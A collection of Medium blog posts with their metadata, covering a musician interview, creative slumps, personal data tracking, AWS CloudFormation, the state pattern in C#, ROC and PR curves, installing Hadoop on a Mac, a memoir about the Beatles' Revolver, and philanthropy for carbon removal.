of GQ, kind of androgynous, really good looking dude…” — would play him if there is ever a movie made about his life. When I ask my final question — if there is a song that isn’t his own that he felt described him — he chooses Changing by John Mayer. “It seems crazy because I’m not personally into country-style music, but it’s some of the best songwriting. ‘I’m not done changing/I may be old and I may be young/but I am not done changing.’ I feel like that’s always relevant for me.” Any creative folks who are anxious about turning their projects into their careers can certainly look to Chris Jobe as an example: Accept that change is inevitable & allow it to fuel your growth. Get ready & stay tuned for Chris Jobe’s upcoming singles by following him on Instagram, Facebook, and Spotify! If you’re in the Nashville area, his next performance is a free show at Analog on April 26th at 8:30pm. Enjoy what you just read? Learn more about Meridian Creators here, give us a like on Facebook, follow us on Instagram & Twitter, and consider supporting our growth by subscribing monthly through Patreon or giving a one-time donation through PayPal!
https://medium.com/meridian-creators/never-done-changing-d685ab455382
['Taralei Griffin']
2018-04-18 00:51:21.337000+00:00
['Nashville', 'Music', 'Interview', 'Creativity', 'Indie']
How to Keep Being Creative When Life Feels Dull and Meaningless
Baltimore Orioles first baseman, Chris Davis, was once one of Major League Baseball’s most-feared juggernauts in the batter’s box. In both 2013 and 2015, he led the majors in home runs and held batting averages of .286 and .262, respectively. But by the end of 2018 and extending into the 2019 season, Davis led the league in another statistic, one far less dominant than the number of times he blasted a baseball out of the park — most at-bats in a row without a single hit. Yep, starting September 14, 2018, and ending April 13, 2019, Davis went 0 for 54, marking a historically abysmal stretch of his career and setting the worst hitting streak record in all of MLB history. On the day his slump finally ended, Davis rejoiced, finishing 3 for 5 with two doubles and four RBIs, raising his batting average from .000 to a whopping .079. Still abysmal, but on the rise. Slumps of Any Kind Are Humbling During the 210 days that Davis went hitless, no doubt he felt humbled and (almost) as human as the rest of us. Switching gears from baseball to creativity, “slumps” are something we all run into as humans, and they’re certainly hurdles I’ve struggled with for as long as I’ve been a writer. I have stretches of days, even weeks, when life feels uninspiring and it’s damn near impossible to type anything worthwhile onto the computer screen. Each subsequent slump I fall into, I can’t help but wonder how many more hints life needs to send me before I finally hang up my cape. I’m repeatedly plagued by the thought that: “Maybe this is a sign I should just quit.” Yet every time, I persevere and break out of the slump, usually with a piece of writing that surprises me and surpasses my wildest expectations. This begs a couple of questions — how do you continue to stay creative when life feels boring or monotonous, and how do you keep moving forward while battling through a massive slump? 1. Remind yourself it’s not the challenge you face but how you respond This holds true with everything that happens to you in life. Sometimes it’s a creative slump, other times misspelling a word in your grade school spelling bee, or reading the rejection letter from your dream college, or being broken up with by your significant other, or suffering the death of a loved one. Challenges come and go, some far more devastating than others, but each time you face one, remind yourself that, though this challenge is different from the others, it’s still just another obstacle in your path. It doesn’t matter what it is — you can’t change or control that. But you can always control how you respond to it. Don’t give up. Keep pushing. Life repeatedly tests you. It wants to try and knock you down, but the strong persevere. They get back up. They keep climbing higher. 2. Get back to the basics Too often, humans like to make things far more complicated than they need to be. Look no further than your own email inbox to prove my point. But let’s look at another example — lifting weights. Or more specifically, let’s look at my dad lifting weights. He’s just over 60 years old, and I’m proud as all hell that he’s keeping himself in shape. Looking at the guy, you’d see that he definitely has an above-average fitness level for a male his age, however, in his own world, he struggles to reach his goals in the gym. He’s one of those guys that reads tons of fitness magazines and articles online, always learning new tips, tricks, and fads for building muscle. He tries putting those complicated routines and obscure exercises into practice. The first week usually goes great — he feels sore and like he’s making progress. Shortly after, results halt and he’s right back in Slumpville. Feeling the frustration of his failures, he gets demotivated and skips workouts. “I’ll get back to it when I’m feeling more inspired next week.” And that’s the root of the problem right there. He tries to make his work too complicated and ends up breaking the cardinal rule of muscle gains — consistency. The same goes for writing and other creative endeavors. When you feel yourself lacking motivation, in a slump, or struggling to produce anything worthwhile, it’s usually a sign that you need to get back to the basics aka creating consistently. Don’t worry about what you write, or how good whatever you’re writing is. You’re not trying to be the next Ernest Hemingway during a slump, you’re just trying to survive through it. Schedule a time to write and just write. Whatever you do, don’t skip a session. Treat it like religion. Get back to the basics and put in the reps. Will it be boring and hard work? Yes, but it’s necessary to remember where you started and keep up with what got you to where you are today. 3. Consume similarly creative content Every time I find myself lacking creativity, it’s almost always because I’ve stopped ingesting similarly creative content. After all, creativity begets creativity. Other pieces of creative art act like food to fuel my own inner creativeness. But it doesn’t work when you consume just any content. For example, binge-watching an anime show on Netflix or playing Hades on the Switch rarely inspires me with new content ideas in the realm of non-fiction writing. Will I sometimes surprise myself and stumble upon an idea I can use? Sure. Does it happen often? No. If I were a screenwriter or video game developer, these might be viable ways to generate creativity, but for me as a writer, they’re traps — ways to distract or unwind more than anything. What I need to do as a writer, and what you need to do as a creator of whatever it is you create, is to consume similar pieces of creative art. I do this by reading non-fiction books, listening to podcasts, answering questions on Quora, and reading other articles on Medium. When you consume other creative pieces of art, it gets your own creative juices flowing, and ideas start erupting out of your mind like a volcano. Write these down. Write them all down. Before long, you’ll have more ideas coming to you than you’ll be able to launch out into the world. This is where you want to be as a creator — infinite backlog land. Above All, Keep Slugging Through At one point during Chris Davis’ record-breaking slump, he considered drastic action. He thought about walking away from baseball and a massive contract worth millions of dollars. To be honest, that probably would’ve been the easy way out. Easy to give up that much cash? Ok, maybe not, but for a guy who, at one time, was the best in the world, quitting the game would’ve been a surefire way to end the tormenting boos of once-adoring fans and repeatedly striking out at the plate. But as English theologian, Thomas Fuller, once said (though more recently popularized in “The Dark Knight” Batman movie): “It’s always darkest before the dawn.” And though a creative slump can sometimes feel like a lifetime of struggle and misery, it’s during those dark, monotonous times that you find out what kind of person you really are. Don’t give up. Keep slugging through.
https://medium.com/better-advice/how-to-keep-being-creative-when-life-feels-dull-and-meaningless-e37cfb4d1315
['Jason Gutierrez']
2020-12-16 06:01:23.878000+00:00
['Inspiration', 'Creativity', 'Motivation', 'Create', 'Self Improvement']
How to collect data from your life?
How to collect data from your life? A beginner’s guide to personal data Photo by Luke Chesser on Unsplash 1. Decide what’s important to you in your life Before start collecting data from your life you should decide why do you want to do it? Do you want to be more productive? Healthier? Happier? Pick one or a couple of areas in your life that you want to improve. But be careful about picking too many fields to track. You should only collect the data that you can process. The key is going steady and slow, not moving fast, and giving up early. What gets measured gets improved. — Peter Drucker After you decide why do you want to collect data and choose some areas to focus on, it is time to identify the data fields to collect. Let’s say want to focus on health, some data fields to collect can be like this: Exercised (true/false) Steps Calorie intake (kcal) Sleep time (hours) Weight (kg) Or maybe you want to track how productive you are during the week, month, or year. In this situation areas to focus on can be listed as: Focused time (minutes) Checked to-do list items (integer) Your own productivity score for the day (out of 10) Main mission (true/false) → Every morning I ask myself “If I could only do one thing today, what should I do?” That’s my main mission for that day. You can do this weekly or monthly but I found out that daily missions work the best.. These are just basic examples you can collect data from every part of your life if you think that is adding some kind of value to your life. Some people track phone screen times, their moods by the weather, their commutes, or -you probably know how popular this is- their Spotify history. You can see other types of tracking ideas in this great post. Since 2013, I have been collecting how many times I sneezed in a year. It started as a misunderstanding, I was supposed to count my blessings in life but I didn’t know that has another meaning. It started like that and now it is my icebreaker story. You can see the silly graph below. 2. Collect data regularly We are only at the stage of collecting the data from our lives. The matter of what we are going to do with the data we collected is another subject for another post. However, before doing anything with it we have to make sure it is collected properly and regularly. Consistency is very important here. If you only log data when you are feeling dull or only when you are super productive, results will not give a clear vision about your life. Every day it gets easier but you gotta do it every day. That’s the hard part. But it does get easier. — Jogging Baboon, Bojack Horseman Try to make a habit of manual data entry. Maybe you can include this in your morning/night routine. Take a cup of hot beverage and dedicate just 5 minutes a day. Create a recurring task at your to-do list app. Use the “Don’t Break the Chain” method. If daily logging is too frequent for you, maybe try weekly. Do whatever works for you to do it regularly, trust me you are going to thank yourself. Photo by Andrew Neel on Unsplash Until this point, we mostly talked about manual data logging but you also try to be as regular as possible with automatic data collection. You may think how can automatic data entry be irregular, the answer is because of you. For example, let’s say you are tracking your sleep, you have to make sure that you have your smartwatch or phone battery is enough to stay on until morning. Or you might be tracking the places you have been over the year, are you sure that you allowed Google Maps to track your location all the time? It is little things like that you should keep an eye on. But no matter how hard you try, sometimes life gets in the way, more important stuff comes up and you can lose the streak. Don’t feel discouraged, we are only human. Just try to fill the gaps as accurately as possible and continue to do what you do. This is a marathon, not a sprint. 3. Tools and systems For all the things I listed above, you can use just a pen and paper but it is almost 2021 and there are much better ways to do it. There are two main categories here. I call them trackers and databases. Trackers are self-explanatory, tools that track data from your life both automatically and manually. Databases are where all of our data sits before we process it. We shape our tools and, thereafter, our tools shape us. — John Culkin Notion Notion is my ultimate database hub and not for just data I collect, for every aspect of my life. How I use Notion as a second brain is a subject to another post but let me show you my setup for next year’s happiness and productivity tracker. I also use this as some kind of a diary. Author’s daily template So what do we have here? This is basically a template to measure how happy and how productive I felt that day. I like to use other fields to create reports at the end of the year. Reports like productivity by days of the week or happiness by exercised days. I also give each day a title like it was an episode from Friends. Such as The One with the Evil Orthodontist or The One With Phoebe’s Birthday Dinner. It is a dorky thing that I do to remember days in a fun way. This might seem like a long list to keep track of every day, but it wasn’t always like this. I started tracking my mood and general wellbeing in 2016. This document has been evolving every year since then. I would like to add some external data, like health, weather, to-do list items, or financial information but it is not possible at this moment with Notion. If you want to use external information, you can use Google Sheets as a database. Google Sheets does almost everything that Notion does but unfortunately, it doesn’t look as good as Notion. Smart watches/bands I believe that smartwatches or smart bands are a bit of luxury items. At the moment you can live just as well without them, they are not essential items for most people, unlike a smartphone. But if you have one it can help a lot to track your life. Photo by Angus Gray on Unsplash Tracking Sleep This is my favorite thing about wearable technology, a device working for you while you are sleeping. I don’t have a lot of information about how does it do that but it is great. You can check your sleep score, the average time you fall asleep at or how many times you wake up in a given night. I believe that you can use these pieces of information to make adjustments that will improve your life immensely. Tracking Steps & Location This is a no-brainer, this is the first objective of a smartwatch. Easy data logging I think removing the friction between thinking and doing is where smartwatches shine. Let’s say you are tracking the water you drink. Pulling your phone off your pocket and logging in after every glass might be a struggle but just a single tap on a screen at your wrist is almost nothing. If you are tracking a field that requires multiple manual data entries in a day, using a smartwatch can help you substantially. Apple Health App Health App that comes on iPhones by default is a tremendous database and tracker. I haven’t been on the Android ecosystem since 2014 but I think Google Fit is doing the same thing on Android devices. Health App can give you graphs and insights based on what you provided already. It can hold up lots of data for years without getting any slower and I think this is amazing. You can export all of your information if you would like to transfer on another app. It is very easy to use, just allow the app to do the work. Photo by Arek Adeoye on Unsplash Rapid fire app suggestions
https://medium.com/datadriveninvestor/collect-data-f55780ca8d49
['Emrecan Arık']
2020-12-26 08:51:01.285000+00:00
['Health', 'Productivity', 'Growth Mindset', 'Personal Development', 'Data']
Sleep Sweet Little One
Sign up for American Haiku Steamship To Writing History By American Haiku Writing takes practice. American Haiku is a great way to put your words from your fingers to your piece of paper. Don't quit, you can do it. Take a look
https://medium.com/american-haiku/sleep-sweet-little-baby-23a5e5389357
['Toni Tails']
2020-09-27 11:39:26.309000+00:00
['Humor', 'Mental Health', 'Creativity', 'Poetry', 'Art']
4 Great But Underrated AWS Services
1. CloudFormation CloudFormation is a service that enables us to describe infrastructure as code. Infrastructure as code is a well-known practice to set out and manage IT infrastructure through the configuration files. With CloudFormation, we can define all required components and dependencies between them. There are a few benefits to having everything in configuration files. First, it makes it possible to speed up the processes, as the task stays only within the code. No navigation between different services and connecting them through the user interface. Second, it adds more reliability and reduces human errors. The code can be reviewed by other engineers, and in case of mistake, the changes can be reverted quickly. For example, the following piece of code creates a new S3 bucket under your account: As you can see, only seven lines of code can create a new S3 bucket with a default setup at any moment. No need to do the job manually through the AWS console. CloudFormation supports two formats: JSON and YAML. Besides that, CloudFormation offers features such as nested stacks, exporting values, or passing parameters between stacks. Indeed, it is a very powerful service to maintain the whole company's infrastructure. CloudFormation is a free service and you need to pay only for provisioned components.
https://medium.com/better-programming/4-great-but-underrated-aws-services-3284ffcb6073
['Dmytro Khmelenko']
2020-10-29 16:35:07.012000+00:00
['AWS', 'Programming', 'Software Development', 'Cloud Computing', 'Cloud']
Stop Using If-Else Statements
APPLIED DESIGN PATTERNS: STATE Stop Using If-Else Statements Write clean, maintainable code without if-else. You’ve watched countless tutorials using If-Else statements. You’ve probably also read programming books promoting the use of If-Else as the de facto branching technique. It’s perhaps even your default mode to use If-Else. But, let’s put an end to that right now, by replacing If-Else with the state objects. Note that you’d use this approach if you’re writing a class with methods that need its implementations to be changed depending on the current state. You’d apply another approach if you’re not dealing with an object’s changing state. Even if you’ve heard about the state pattern, you might wonder how it is implemented in production-ready code. For anyone who’s still in the dark, here’s a very brief introduction. You’ll increase complexity with any new conditional requirement implemented using If-Else. Applying the state pattern, you simply alter an objects behavior using specialized state objects instead of If-Else statements. Gone are the days with code looking like this below. Warning: PTSD trigger — also, hope you caught the logical error in here (other than the whole thing being a mess) You’ve certainly written more complicated branching before. I have for sure some years ago. The branching logic above isn’t even very complex — but try adding new conditions and you’ll see the thing explode. Also, if you think creating new classes instead of simply using branching statements sounds annoying, wait till you see it in action. It’s concise and elegant. Even better, it’ll make your codebase more SOLID, except for the “D” part tho. “Okay, I’m convinced If-Else is evil, now show me how to avoid messy branching code” We’ll be looking at how I replace If-Else branching in production-ready code. It’s a made-up example, but the approach is the same I’ve used in codebases for large clients. Let’s create a very simple Booking class, that has a few states. It’ll also have two public methods: Accept() and Cancel() . I’ve drawn a diagram to the best of my abilities that displays the different states a booking may be in. Refactoring branching logic out of our code is a three step process: Create an abstract base state class Implement each state as a separate class inheriting from base state Let the Booking ` class have a private or internal method that takes the state base class as a parameter Demo time First, we need a base state class that all states will inherit from. Notice how this base class also has the two methods, Accept and Cancel — although here they are marked as internal. Additionally, the base state has a “special” EnterState(Booking booking) method. This is called whenever a new state is assigned to the booking object. Secondly, we’re making separate classes for each state we want to represent. Notice how each class represents a state as described in the beautiful diagram above. Also, the CancelledState won’t allow our booking to transition to a new state. This class is very similar in spirit to the Null Object Pattern. Finally, the booking class itself. See how the booking class is simply delegating the implementation of Accept and Cancel to its state object? Doing this allows us to remove much of the conditional logic, and lets each state only focus on what’s important to itself — the current state also has the opportunity to transition the booking to a new state. How to deal with new conditional features? If the new feature would normally have been implemented using some conditional checking, you can now just create a new state class. It’s as simple as that. You’ll no longer have to deal with unwieldy if-else statements. How do I persist the state object in a database? You don’t. The state object is not important when saving an object to e.g. an SQL or NoSQL database. Only knowing the object’s state and how it should be mapped to a column is important. You can map a state to a friendly type name, an enum or an integer. Whatever you’re comfortable with, as long as you have some way of converting the saved value back into a state object. But you’re still using IFs? Yes — they’re essential. Especially when used as guard clauses. It’s the If-Else combination that is a root cause for maintainability headaches. It’s a lot of additional classes! Indeed. As I’ve mentioned in another article, complexity does not originate from the number of classes you have, but from the responsibilities those classes take. Having many, specialized classes will make your codebase more readable, maintainable, and simply overall more enjoyable to work with.
https://medium.com/swlh/stop-using-if-else-statements-f4d2323e6e4
['Nicklas Millard']
2020-12-15 17:42:16.136000+00:00
['Technology', 'Software Engineering', 'Csharp', 'Programming', 'Software Development']
深入介紹及比較ROC曲線及PR曲線
深入介紹及比較ROC曲線及PR曲線 在一個二分類模型中,我們的模型通常不會直接輸出0,1直接預測出分類,而是對每個分類輸出一個機率,例如加上softmax對各分類輸出機率,這樣讓我們能夠自己設定一個門檻(threshold)來決定機率大於多少時我們判定為正樣本,反之為負樣本。而 ROC Curves 和 PR Curves 可以幫助我們分析這樣的 probablistic forcast ROC 曲線以 FPR 為 X 軸,TPR為 Y 軸,每一個點代表設定不同的門檻值所得到的不同的 FPR 及 TPR ,最後繪製成一條曲線。建議可以參考我另一篇文章所介紹的混淆矩陣,以下會再介紹如何計算出 FPR 及 TPR FPR表示成 1-特異度 而特異度(specificity)意指正確判斷出負樣本,故特異度越高、FPR越低,模型越能夠正確判斷負樣本、表現越好 TPR又稱為敏感度(Sensitivity),它也是我們熟知的召回率(Recall),也就是正確判斷出正樣本,故TPR越高則模型越能夠正確判斷正樣本、表現越好 When using normalized units, the area under the curve (often referred to as simply the AUC) is equal to the probability that a classifier will rank a randomly chosen positive instance higher than a randomly chosen negative one (assuming ‘positive’ ranks higher than ‘negative’) — from wikipedia
https://medium.com/nlp-tsupei/roc-pr-%E6%9B%B2%E7%B7%9A-f3faa2231b8c
['Chen Tsu Pei']
2020-01-02 07:20:09.214000+00:00
['Evaluation', 'AI', 'Python', 'Classification', 'Machine Learning']
Knowledge is More Than a Point of Data.
Every month, with clockwork like precision a brown paper package arrives in the mail. The unwrapping is revealing. For almost 50 years the National Geographic has been enriching my imagination. The connectedness to ourselves, to our planet and cosmos is like a lattice of human context. It’s also an important source for our visual and aesthetic literacy. I see our graphically visual world as distinctly human, whereas raw data points have no human essence. There should be no mistaking data for knowledge. Big Data, and data visualization are important topics. But it’s troubling when they’re stories reduced to little more than ill-defined link bait. Accepting there’s also no unified theory or singular definitions for either data or it’s visualization is important too. We can discern between structured (bits of ledger) and unstructured data (streams of social chatter), but data itself is simply the columns and rows fodder. It’s the slices of pie in that fill a chart. Spreadsheets and pie charts are meaningless artifacts. It’s the art of asking questions that brings them to life. Transforming crumbs of data into information, in turn gets us to the possibility of knowing. Without structure, data doesn’t become knowledge. It’s like looking into a murky swamp and trying to understand the dividing properties of an amoeba. Try viewing it in a petri dish instead. Appreciating when there’s no structure, there’s no meaning attracted me to Manual Lima’s book Visual Complexity. It’s influenced my appreciation of visual literacy. It was also cool seeing Mentionmapp on page 153. With a historical context and framework of techniques and best practices, Visual Complexity also help me discover other visualization leaders (who we’ll write about in future posts). Lima’s depiction of the visualize network being “the syntax of a new language,” made an impression. Knowing that sight is the translational interface between a visual object and a textual relationship, was my… “ahhh, that’s it moment.” When data intersects with visual science, there needs to be an aesthetic anchoring for knowledge to surface. There has to be an art to the science. Lima shares this Matt Woolman quote; “functional visualizations are more than statistical analyses and computation algorithms. They must make sense to the users and require a visual language systems that uses colour, shape, line, hierarchy, and composition to communicate clearly and appropriately, much like the alphabetic and character based languages used worldwide between humans.” From his TED2015 talk Lima says, “we can see this shift from trees into networks in many domains of knowledge. This metaphor of the network, is really already adopting various shapes and forms, and it’s almost becoming a growing visual taxonomy.” Watch Manuel Lima: A visual history of human knowledge Using data and revealing a world of stories is an art. I’m appreciative of how Lima communicates the aesthetic value of visualization. Turning the complex and the chaotic into meaningful social, political, economic, and human insights is essential. We can’t get so lost in the science of data that we forget the importance of allowing our eyes, and allowing ourselves to both revel in it, and to discover knowledge in the art of data. Conceptual artist Katie Lewis devises elaborate methods of recording data about herself, be it sensations felt by various body parts or other other aspects of life’s minutiae plotted over time using little more than pins, thread and pencil marked dates. The artworks themselves are abstracted from their actual purpose, and only the organic forms representing the accumulation data over time are left. She describes her process as being extremely rigid, involving the creation of strict rules on how data is collected, documented, and eventually transformed into these pseudo-scientific installations. From the pen of John (cofounder) Please visit Mentionmapp today!
https://medium.com/mentionmapp/knowledge-is-more-than-a-point-of-data-dc31f94a1a4
['Mentionmapp Analytics']
2016-10-30 21:57:16.840000+00:00
['Manuel Lima', 'Data Science', 'Data Visualization', 'Big Data', 'Design']
Revolver changed my life
Revolver changed my life I was in either 7th or 8th grade, and I went to a record store to buy a Beatles album. It was also the very first time I would ever buy a record. I didn’t know much about The Beatles other than any song I heard I liked. One summer I went to day camp at The Thomas School of Horsemanship. Whenever it rained they’d set up chairs in a big barn space and show Help. I think it was the only movie the camp had, and I saw the first 40 minutes of it five times that summer. I loved the in the floor bed John Lennon had. My aunt had two cats named George and Ringo. I knew the other two Beatles were named Paul and John. And that was the extent of my Beatles knowledge. And armed with that scant knowledge I flipped through a bunch of twelve inch 33 1/3 Beatles albums, with their always interesting covers and names. Help. Hard Days Night. Meet the Beatles (in the US it was Meet the Beatles, not With the Beatles). Sgt Peppers. Magical Mystery Tour. The white one. One with no name on it but a picture of four guys with beards and long hair walking in a neighborhood across the road. And there was this weird one with a mostly white cover and line drawings of the four of them. I flipped the various albums over and looked at song titles, figuring I’d buy whatever one had the most songs I actually knew. There were crazy titles! Being For the Benefit of Mr Kite! Polyethylene Pam! Dear Prudence! The Word! I didn’t know these songs. There were so many songs I didn’t know. I couldn’t imagine what they all might sound like. On the mostly white one with the weird cover drawings I knew two songs, Eleanor Rigby and Yellow Submarine, so that was the album I bought. We had a cheap shit stereo at home and a good stereo at home. The cheap shit one was a Panasonic all-in-one with Thruster Speakers… I played the first album I ever bought on the Panasonic in the kids room downstairs in our house. We all have expectations. I knew Eleanor Rigby and Yellow Submarine, so that was what I expected Revolver to sound like. Revolver side one song one begins with some noise — some squirps and chatter, and then a voice: “One Two Three…” Suddenly, a guitar chord slams like someone dropping a metal garbage can lid, a huge bass rolls in and a weird, nasal voice announces, “Let me tell you how it will be…” “What the fuck is this?” I thought. Taxman. Good god. From there it went all around the planet and into the stars. I’d never heard anything like it. Side one ended with a short, fireball of a song called She Said She Said. It was the coolest guitar playing I’d ever heard. The drumming — there’s no words for it. It’s perfect and at the same time it sounds like someone falling down the stairs. The voice trails off at the end, overlapping and repeating, “I know what it’s like to be dead I know what it is to be sad I know what it’s like to be dead I know what it is to be sad….” She Said She Said became my official favorite Beatles song. Side one… I flipped the record over and played side two… There is nothing that can possibly… I mean… how do you even begin to talk about the last song on side 2, the last song on Revolver? How do you talk about Tomorrow Never Knows? It starts with a whine, kick ass drums, and then what sounds like a rampant army of angry lemmings fade in. Throughout it are jags of violins and orchestras, more lemmings, what sounds like a radio message from outer space that I later discovered was a backwards guitar solo, impenetrable lyrics, a bass that was one note over and over again until the whole thing spun apart into a player piano and a last violin line sucked up into a hole in the sky. It was like the world sounded different after that song. There’s STILL nothing like it. Tomorrow Never Knows is a singularly. It’s the weirdest catchy beautiful cacophony ever made. Who know what the hell it is. Heaven, hell, all places in between. Up down, left right, in out. I had sat there, my chin perched on the back of a couch with my head stuck between the speakers for 35 minutes, and I was exhausted. I laid on the floor and looked at the album jacket, the drawn and collaged front, and the photo of the band on the back. I knew this was my favorite album, and that that would never change. And I knew… I knew that I wanted to do something that I didn’t have a name for. I wanted to be in a band and play guitar and write songs — I knew all that, but there was something else. I wanted to… be part of something like Revolver. To build something like that. To make records. Records that weren’t just music. At the top back cover, above the list of songs, there was a sentence I didn’t quite understand. It said, “Recording produced by GEORGE MARTIN.” I didn’t know what it meant, but I was pretty sure it was the job description for me. I went on to produce records. Revolver was the standard and the inspiration. After my tinnitus ended thoughts of working in music I went on to direct plays, and again Revolver was there somehow. Somehow the sense of humor, experimentation, the delight, the oddness, the gorgeousness, the memorability of Revolver is always with me. After 40+ years, Revolver still clues me into the power of art, the power of music, and what it means to manifest the invisible — to do the work of the artist.
https://lukedelalio.medium.com/revolver-changed-my-life-f0b753f70901
['Luke Delalio']
2020-09-26 00:31:19.766000+00:00
['Beatles', 'Creativity', 'Revolver', 'Music']
Installing Hadoop on a Mac
Is the only thing standing between you and Hadoop just trying to figure out how to install it on a Mac? A quick internet search will show you the lack of information about this fairly simple process. In this brief tutorial, I will show you how you can very easily install Hadoop 3.2.1 on a macOS Mojave (version 10.14.6) using Terminal for a single node cluster in pseudo-distributed mode. To begin, you will need to have installed several packages that need to be placed in the appropriate directories. The HomeBrew website has made this a very simple task, automatically determining what is needed on your machine, installing correct directories and symlinking their files into /user/local. Additional documentation may also be found on their website. Install HomeBrew Copy the command at the top of the page and paste into a new terminal window. You will be notified of what will be installed. Pressing RETURN initiates the process: $ /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" Confirm you have the correct version of java (version 8) on your machine. If it returns anything other than 1.8., be sure to install the correct version. $ java -version $ brew cask install homebrew/cask-versions/adoptopenjdk8 Install Hadoop Next, you will install the most current version of Hadoop at the path: /usr/local/Cellar/hadoop. This happens to be 3.2.1 at the time of the writing of this article: $ brew install hadoop Configure Hadoop Configuring Hadoop will take place over a few steps. A more detailed version can be found in the Apache Hadoop documentation for setting up a single node cluster. (Be sure to follow along with the correct version installed on your machine.) Updating the environment variable settings Make changes to core-, hdfs-, mapred- and yarn-site.xml files Remove password requirement (if necessary) Format NameNode Open the document containing the environment variable settings : $ cd /usr/local/cellar/hadoop/3.2.1/libexec/etc/hadoop $ open hadoop-env.sh Make the following changes to the document, save and close. Add the location for export JAVA_HOME export JAVA_HOME= “/Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Home” You can find this path by using the following code in the terminal window: $ /usr/libexec/java_home Replace information for export HADOOP_OPTS change export HADOOP_OPTS=”-Djava.net.preferIPv4Stack=true” to export HADOOP_OPTS = ”-Djava.net.preferIPv4Stack=true -Djava.security.krb5.realm= -Djava.security.krb5.kdc=” Make changes to core files $ open core-site.xml <configuration> <property> <name>fs.defaultFS</name> <value>hdfs://localhost:9000</value> </property> </configuration> Make changes to hdfs files $ open hdfs-site.xml <configuration> <property> <name>dfs.replication</name> <value>1</value> </property> </configuration> Make changes to mapred files $ open mapred-site.xml <configuration> <property> <name>mapreduce.framework.name</name> <value>yarn</value> </property> <property> <name>mapreduce.application.classpath</name> <value>$HADOOP_MAPRED_HOME/share/hadoop/mapreduce/*:$HADOOP_MAPRED_HOME/share/hadoop/mapreduce/lib/*</value> </property> </configuration> Make changes to yarn files $ open yarn-site.xml <configuration> <property> <name>yarn.nodemanager.aux-services</name> <value>mapreduce_shuffle</value> </property> <property> <name>yarn.nodemanager.env-whitelist</name> <value>JAVA_HOME,HADOOP_COMMON_HOME,HADOOP_HDFS_HOME,HADOOP_CONF_DIR,CLASSPATH_PREPEND_DISTCACHE,HADOOP_YARN_HOME,HADOOP_MAPRED_HOME</value> </property> </configuration> Remove password requirement Check if you’re able to ssh without a password before moving to the next step to prevent unexpected results when formatting the NameNode. $ ssh localhost If this does not return a last login time, use the following commands to remove the need to insert a password. $ ssh-keygen -t rsa -P '' -f ~/.ssh/id_rsa $ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys $ chmod 0600 ~/.ssh/authorized_keys Format NameNode $ cd /usr/local/cellar/hadoop/3.2.1/libexec/bin $ hdfs namenode -format A warning will tell you that a directory for logs is being created. You will be prompted to re-format filesystem in Storage Directory root. Say Y and press RETURN. Run Hadoop $ cd /usr/local/cellar/hadoop/3.2.1/libexec/sbin $ ./start-all.sh $ jps After running jps, you should have confirmation that all the parts of Hadoop have been installed and running. You should see something like this: 66896 ResourceManager 66692 SecondaryNameNode 66535 DataNode 67350 Jps 66422 NameNode67005 NodeManager Open a web browser to see your configurations for the current session. http://localhost:9870 Information about your current Hadoop session. Close Hadoop Close Hadoop when you are all done. $ ./stop-all.sh I hope this short article has helped you get over the hurdle of installing Hadoop on your macOS machine!
https://towardsdatascience.com/installing-hadoop-on-a-mac-ec01c67b003c
['Siphu Langeni']
2020-04-02 02:37:52.066000+00:00
['Data Science', 'Hadoop', 'Data Engineering', 'Big Data', 'Mac Os X']
How philanthropy can help to scale carbon removal
To be clear, we are not suggesting that more mature solutions merit less support — rather, forestry, BECCS, and DAC simply require different types of support concomitant with their relative level of technological readiness. For instance, funding for communications is required to socialize the understanding that not all removal equates to BECCS, and that direct air capture is poised for rapid cost reductions as it will benefit from learning by doing and economies of scale (much in the same way as solar photovoltaics continually beat expert forecasts on price declines and capacity additions). However, we will focus this discussion on several less-heralded carbon removal solutions: enhanced weathering, soil carbon sequestration, and ocean removal approaches. Many of these solutions still have major question marks that philanthropic funding can help answer in order to drive their development forward. Enhanced weathering: Over geologic time scales, the natural weathering of rocks containing certain minerals — like serpentine, silicates, carbonates, and oxides — draws down carbon dioxide from the atmosphere and stores it in stable mineral forms, thereby playing an important role in regulating atmospheric CO2 concentrations. The centuries and millennia that these reactions typically take are too slow to help with the climate crisis. Fortunately, there are ways of safely speeding up the weathering. By grinding up rocks to increase their reactive surface area or by adding heat or acids to speed up reaction rates, enhanced weathering could be an important climate solution with huge potential to scale. (Experts estimate that, after considering energy requirements, enhanced weathering could reasonably remove up to 4 gigatons of carbon per year.) Philanthropy can support basic research to substantiate these claims in the real world, focusing on supporting process improvements and mapping resource potentials. If the benefits of enhanced weathering prove to exceed the challenges, the near-term research efforts funded by philanthropy can help unlock greater government RD&D and help secure private capital to move this approach from the lab to pilots. Soil carbon sequestration: Soils have the potential to store carbon at scale, though global soils have historically lost an estimated 133 Gt of carbon due to human-driven land use change. Today, there are a wide variety of land management strategies, practices, and technologies that fall under the aegis of soil carbon sequestration that can restore a portion of this lost carbon. However, there is no one-size fits all system that can help realize that scale. The efficacy of these practices turns on local soil type, climatic factors, and crop type. Philanthropy has been and should continue to fund research to better answer basic questions around which practices are most effective in what scenarios and how permanent the removal is. In addition to practice change, research to explore new varieties and crop types that sequester more carbon will be critical. For example, we are learning that switching to crop types with long roots, such as kernza, may support even greater soil carbon storage potential than can be realized through land management practice changes alone. There is also currently no streamlined, consistent, and cost-effective way to measure and verify soil carbon sequestration on the farm-level. This lack of protocols could greatly influence our assessment of soil carbon sequestration potential and hinder the incorporation of these practices into climate policy frameworks. Philanthropy can play a big role in incentivizing streamlining among current standards and in helping to set up the frameworks of the future. Sequestration efforts should also be combined with efforts to boost crop yields, allowing us to both store more carbon in the soil, prepare our food systems for the effects of a changing climate, and free up additional land for high-carbon ecosystems (such as forests and wetlands). Increasingly, land will be stretched to deliver on multiple priorities — from food production to ecosystem services to bioenergy production to carbon sequestration — and philanthropy can play an important coordination and consolidation role among these veins of research. Ocean approaches: There are a number of ocean-based approaches that haven’t been explored in detail to-date. In fact, the National Academy of Sciences excluded ocean approaches (except coastal wetland restoration) in their recent landmark report. These approaches utilize ocean ecosystems to sequester carbon and can include direct ocean capture, kelp farming, ocean alkalinity enhancement, and other blue carbon approaches. Because many of these strategies are in the early stages of development today, it will be important for philanthropy to support analyses to better understand the technical and economic potential for these solutions, as well as any risks from early deployment that would necessitate governance standards in the near term. There are a number of ocean-based approaches to carbon removal that haven’t been explored in detail to-date, including kelp farming. Photo: Shane Stagner Climate philanthropy is in a unique position to accelerate progress on carbon removal and increase the odds that multiple removal approaches reach gigaton scale before 2050. 